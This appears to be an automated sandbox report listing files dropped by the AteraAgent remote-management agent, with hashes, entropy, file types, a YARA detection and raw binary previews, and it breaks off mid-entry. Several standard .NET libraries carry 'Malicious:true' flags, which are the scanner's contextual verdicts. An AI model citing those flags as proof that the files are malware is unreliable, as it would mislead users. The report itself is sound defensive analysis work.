                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):285744
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.190004154231823
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:uZAWecOmop6I4A9YzsRuBeXirS9/pcRykxxNKKV6S8mSrpsPngH:uZeZ6ANRIru9/pcMkoKV64SrWA
                                                                                                                                                                                                                                                                                              MD5:2CD03F275D3BB90B106632F203DCAF64
                                                                                                                                                                                                                                                                                              SHA1:025C716D6B123FA03DC9F97D4BF77D4AF20B75AE
                                                                                                                                                                                                                                                                                              SHA-256:B90619EBE88644BDA995505BDE5D5E282403E27FF7A55E273CC2FF9ACC88300A
                                                                                                                                                                                                                                                                                              SHA-512:321660D33F6126077D4DC04AFBB341B9D46D07E2B38CF45F1C7B2C8B60A58A3F008390EE6F8B6995BECF4B0EADF66C9263D4BE67C8269F9A0851207650B9632D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....O..........." ..0..*...........H... ...`....... ....................................`..................................H..O....`..L............4..0(...........G..T............................................ ............... ..H............text....(... ...*.................. ..`.rsrc...L....`.......,..............@..@.reloc...............2..............@..B.................H......H.......Hd......................LG......................................^.{....,.(F...z..}.....*^.{....,.(F...z..}.....*"..(K...*"..(L...*...0..,.......s.......}............s9...sv....{.....(....*.0..-.......s.......}............s9....s.....{.....(....*....0..(.......s.......}............s9.....{.....(....*.0..'.......s.......}............s9...sv.....(....*B...s......(....*......(....*.0..'.......s.......}............s9...sv.....(....*F...s.......(....*....0..X.........(:...}

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\StructureMap.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):284208
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.117448325022863
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:/ZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xH9:Bgo0WPVTXgd
                                                                                                                                                                                                                                                                                              MD5:BF59A9BBF620C0F06ED79180C868FCE0
                                                                                                                                                                                                                                                                                              SHA1:2E8F9EF7A105A951790344A3B9ADC61DB35ABAAD
                                                                                                                                                                                                                                                                                              SHA-256:CEBDB552DAC9E136F87E37A461B7683934F00AA2A74FBA15BC53ADFA38F1B79E
                                                                                                                                                                                                                                                                                              SHA-512:C472376BD7A0E532CB8FDDA7ADDB00FB973D30F97368460929E8352C16BCB17EA92264C81E1E1E084566172ECE3D1513073D24B01990A808335D0C040039C6D3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ..............................\.....`..................................B..O....`..D...............0(...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Buffers.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22064
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.678227546122444
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Xy/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqq/dW:XuhMaVmzDC67EpYinAMxCwk
                                                                                                                                                                                                                                                                                              MD5:181F16CCEBD4B02ACE42A02CC536ACA9
                                                                                                                                                                                                                                                                                              SHA1:84795DA0255E288C96AC64F1C8150E81E0289FFD
                                                                                                                                                                                                                                                                                              SHA-256:80582DBDE89A6D9906721AD27562C7B2BEDE7048E4D461828D3BA2C4438E58E9
                                                                                                                                                                                                                                                                                              SHA-512:73F93A3F4538FCE421A453B5A90AC662CC58D5A846AFECB8E337F33A1D643A81C8D02F5F3AECAE4CF00828A3103C63614F086E92ABD262317B13CF608784D72A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............0(...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51760
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.235108733243218
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:bzpj9H0/bvvmNAkkOMo/23e3vggrkrD9Bxjpm2yuIFLlHTUpa/hDXEpYinAMxCWC:bzpjF0/t043e3vggr83jMYa/hU7HxVJU
                                                                                                                                                                                                                                                                                              MD5:30BD9DF0841299E8FA11340B83A441B0
                                                                                                                                                                                                                                                                                              SHA1:36447785062CB3DFDF9A1E03548EFD348760458F
                                                                                                                                                                                                                                                                                              SHA-256:801BB92AA7A8840148FE548ECE4B7291C0E4FA73712FE2497074C925ECC906B9
                                                                                                                                                                                                                                                                                              SHA-512:830B821EE5BF401A6B95662EE191FC8BF08BF64D4D8BFBDB0E142D303AB241C41C4134883C0851B4D5DAF49F598454CE33595787C7084B4F9504794D9B07E54B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0.................. ........... ....................................@.................................X...O.......................0(.......... ................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........J...g..........p...0.............................................{!...*:.(".....}!...*..0..#........u......,.(#....{!....{!...o$...*.*v ..yN )UU.Z(#....{!...o%...X*....0..M........r...p......%..{!....................-.q.............-.&.+.......o&....('...*..{(...*:.(".....}(...*.0..#........u......,.(#....{(....{(...o$...*.*v ..:. )UU.Z(#....{(...o%...X*....0..M........r-..p......%..{(....................-.q.............-.&.+.......o&....('...*..{)...*..{*...*V.("...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Memory.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138288
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.179673461309118
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:MP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8Ily:Mh0qjC5RMOHO420kN1Z
                                                                                                                                                                                                                                                                                              MD5:37C069A058DC803C83C43DF6681907DA
                                                                                                                                                                                                                                                                                              SHA1:ED522080452C472560A74F4B979BDC5CFE1643E7
                                                                                                                                                                                                                                                                                              SHA-256:9CD89ED91343ABF19DEF9EE1809AC28765EB3D63E5597583D3D183156D8B3C62
                                                                                                                                                                                                                                                                                              SHA-512:1F38E4153FBFF9C996C3348A325AC3E9B43118D97F5E51B1099D09C61BFC4D772ADE110603D479403317AD76AD42F494E55A58E278F825EFBFA6E1ABEE246929
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`......!.....@.................................3...O.... ..0...............0(...@..........8............................................ ............... ..H............text...\.... ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................g.......H........ ..............P.......8.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17968
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.674524887219165
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Hh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBr882HW:Hy9eEpYinAMxCAT2HW
                                                                                                                                                                                                                                                                                              MD5:3D126403FBA7BC6FAC6E6ABF5FCE09E8
                                                                                                                                                                                                                                                                                              SHA1:70B60D649EB174C109C0A6DC873444473D956694
                                                                                                                                                                                                                                                                                              SHA-256:D2B815734C2683E7759DEEA3019FCD2B19F5B879CFA3BA02620619DBCAF73E38
                                                                                                                                                                                                                                                                                              SHA-512:BC0D56E79471051228DB678AC686BE96BEA6697C2376AE28574EDBAD52CF827AE720A7F733B6FE96B2757610771137B6E6A6CF86B787128136D17B232F09569D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ..............................R.....@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27184
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.335679732582514
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Qn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCF:QnvXYcIh6yFIFBYpc47HxG
                                                                                                                                                                                                                                                                                              MD5:14C4B9D7E63166E65ECCD9A74A55BC4A
                                                                                                                                                                                                                                                                                              SHA1:C1F849748FBC76EC9BF9BF934135860242CE1928
                                                                                                                                                                                                                                                                                              SHA-256:83BBFBEDA8EFB1745ECDDBEE0FB16ECAE1E6524461FE075B90C700E34C78498F
                                                                                                                                                                                                                                                                                              SHA-512:C2774C72B62148FFFF05B2714F4720D212F52F740812D307D683D66709D77FD06F325A4DB25D952B9B2CCA5A1DD60CEDFCBFB6420FA5CE1A81B9D711395671A1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ub.X.........." ..0..8...........W... ...`....... ....................................@.................................dW..O....`...............B..0(..........,V............................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................W......H.......4%..p/...........T.......U......................................r~....-.(....s.........~....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*2r...p.(....*......(....*2(.....(....*^~....-.(.........~....*..0..........~..........(

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):73264
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.95485496879401
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRY:67N1r9KGI04CCARLY
                                                                                                                                                                                                                                                                                              MD5:B742B57BE990E57E0D079CFAF918E086
                                                                                                                                                                                                                                                                                              SHA1:00652CB0AD4ABCE039397AF2308B2D6D251A2B09
                                                                                                                                                                                                                                                                                              SHA-256:8929394DD35DBF2592AAE46E1063D38D782122F2A7F6A0248A754817E4394823
                                                                                                                                                                                                                                                                                              SHA-512:2CD15A7F0626AD3BBA10431AEEFEDE1A195987BA609EC01A51083EEEF11DA516FF4D0678451372106A27A66E013A1012FB00E74CB4F4125C7F451559DE326908
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`......4T....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3589532
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9999266027103735
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:98304:YylpVobXLx8h6xRBXbtjPZX622ysoac658SrSOubme:YGh6/h36ZesPu5V
                                                                                                                                                                                                                                                                                              MD5:93E4C198656FC267F392DE11DEE01CD0
                                                                                                                                                                                                                                                                                              SHA1:E92CB59486745EE7564F5B374E790A065E1F4678
                                                                                                                                                                                                                                                                                              SHA-256:88B220F9F9BF25F856DDA714AA1A1AE998720780CD3EC5B968154E03834FA965
                                                                                                                                                                                                                                                                                              SHA-512:3A04A02982DBBBB9D54B6C5674F2F2C10E0CBCE580E3974CD924CC9131CD94AECE71C7B975C9ABAAE82F057C70243FB016D31339E8700C96BD55C434BB98105F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK..-.....ud.YS.W.........1...AgentPackageMonitoring/AgentPackageMonitoring.exe....(6.......~.......6.s+3t..d........e..M...K@./0o...i"Mw..C/....12..O.....a......X.-.D.....L...}{.P...!7....b|..+....L.....8K.N..O..O._..n. ...Db`.pF<.V...d..=!...O...{Cc...I...-....;w<......b....W.=...),0~.*:3./k[.w.7d....f9i.RG.T$_...o.OZ"s...rX<a..Di..;.........K.h...C..!HA.e.....M.B....}.r.p..K.e%....L....4.7..D...r.U+... b.7..sl.`6.>..moH,......h...I(ut.q...8.6..[n......v...i..E.[E.~...v+.>.J....9....0.#~.I.b-R...i/.!..x.3..%oM[L..._.u,..h?....W......n.Q.;D.aa....K_.s.U..)....lF.;..Jw.t..ju.....}o..g[...._....j*..g..l.1..+.x..<9....-d...'.(.p%$...0....;^.f...w~L[@..H....Z.(IkNa..9DR....?.....~.[.:..IR.G....4)..Z.?.;.W?...Q.u.....V.....>7];.`./.R..9q.....XH.G..4.S.G......-t.0.Z.(.~......I@5/c.....b.E..kb.X....9I.B]J....DQ.j.TT.....?#4,.l.Shx.!....w...k].W.b..l{.jR...ep...J....`....%.*"q?.Smo+)".Z.........<.DZ<.m..Pw?|'..i.vJ..)...7y..^.D#...0O|k.{...A.M.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):407080
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.258938058111771
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:hkeEB9gZiG47PijJOcABetwyGRUAvILNqe8R:hETbPgJ9wyGmAvx
                                                                                                                                                                                                                                                                                              MD5:810F893E58861909B134FA72E3BC90CD
                                                                                                                                                                                                                                                                                              SHA1:524977F32836634132D23997B23304574D8D156A
                                                                                                                                                                                                                                                                                              SHA-256:B83B6C1F64B6700D7444586A6214858A1479C58571F5E7BF4F023166C9016733
                                                                                                                                                                                                                                                                                              SHA-512:DB463D34A37403A9248D463AE63989B40A0172D9543BDA922DACB10A624EB603700628A67D9C86DF2605C36D789902EC79228AA29F26C49BE0195C54A9E4A191
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ...@....@.. ...............................D....`.................................:...O....@..(...............((...`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......................@..B................n.......H........9..p.............................................................{'...*..{(...*..{)...*r.(*.....}'.....}(.....})...*....0..Y........u........L.,G(+....{'....{'...o,...,/(-....{(....{(...o....,.(/....{)....{)...o0...*.*.*....0..K....... bHQ. )UU.Z(+....{'...o1...X )UU.Z(-....{(...o2...X )UU.Z(/....{)...o3...X*..0...........r...p......%..{'......%q.........-.&.+.......o4....%..{(......%q.........-.&.+.......o4....%..{)......%q.........-.&.+.......o4....(5...*..{6...*:.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1459
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.033662307409642
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:2dErdGPF7Nv+13vH2/nVhOXrRH2/d9XF7N0PH2/+w39XF7NQ7uH2/F9y:cErU7h+1/gn27Rgdz7Eg+w3z76agFw
                                                                                                                                                                                                                                                                                              MD5:C6ECF24757926EBA64E674BFF8B747D1
                                                                                                                                                                                                                                                                                              SHA1:3A46083826C20E8E085C42BBFDFEEF4F9E2B90D9
                                                                                                                                                                                                                                                                                              SHA-256:C3EC04142C15B0A237E72CE1C3C85D19CD1231B9824F7A9854E7909A74B7BECC
                                                                                                                                                                                                                                                                                              SHA-512:EFABB9883ADB098A90115E8938C92B76BBB8D2EB5DE170ECFA205EE949A2D722E0F97F6E01F9A71AC8B5FA2108B9FF82FA0171759D50E30D0AB5FC1948BDCE15
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.9.1.0" newVersion="2.9.1.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhWan:WD
                                                                                                                                                                                                                                                                                              MD5:A6BD887EE94E12D3C42A5D47B4C73826
                                                                                                                                                                                                                                                                                              SHA1:6B30541A5B528FF8A8BEFDB5CAB0B9DCCF4B2491
                                                                                                                                                                                                                                                                                              SHA-256:643D32F1B400E5CDC5B76067EAC006167C07B321D5ABD06B30F1A45E9FE2253C
                                                                                                                                                                                                                                                                                              SHA-512:EC86B4BEDA8995C13F550CE0F1C60B7BF384F706D37C516A12C6E6D6E0040BC11F72E9AF09117D78B46BB799E9E41F4F6B2E78B84C2CF087AC76A1EB94986171
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=38.1

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):102440
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.190271548489902
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:jPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OLv476/:j2bYbYSWd85I5sSakFQhHLv4k
                                                                                                                                                                                                                                                                                              MD5:04574008839C988B1598DF22015A4285
                                                                                                                                                                                                                                                                                              SHA1:9176EE5F15BF855F1A0ED1CAD5F1C33E29841D01
                                                                                                                                                                                                                                                                                              SHA-256:6347791BE389BF6BF83F6A499077CFC874E282B6515B7400F09950C35AE4A5B0
                                                                                                                                                                                                                                                                                              SHA-512:D21C39CA74C2DF27F0969A8E61A0A4B055B9765A3A87E34D05AC17570FC9CC7FB149034FA35F0F7F06231C116E4B61A88372ACD0704A68634E2E35E38797994D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5*f.........." ..0..^...........}... ........... ...............................I....`.................................`}..O.......8............h..((..........(|............................................... ............... ..H............text....]... ...^.................. ..`.rsrc...8............`..............@..@.reloc...............f..............@..B.................}......H........s..|............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):95272
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.995771579764986
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:x4aRSNSrXS5EaKoDMsUVl0HAWMco2bJkjUB766B:x4auS7S5Ea6WMcpuUB/
                                                                                                                                                                                                                                                                                              MD5:D132E136DB67781D6B7A78531B0890CC
                                                                                                                                                                                                                                                                                              SHA1:9E3CE11B6F880B50338768B88F4E9ACC1BB98EE5
                                                                                                                                                                                                                                                                                              SHA-256:01243BC9656F0F1F49A5A03807A8688408FE8685577351C8FC83A8251AC2603A
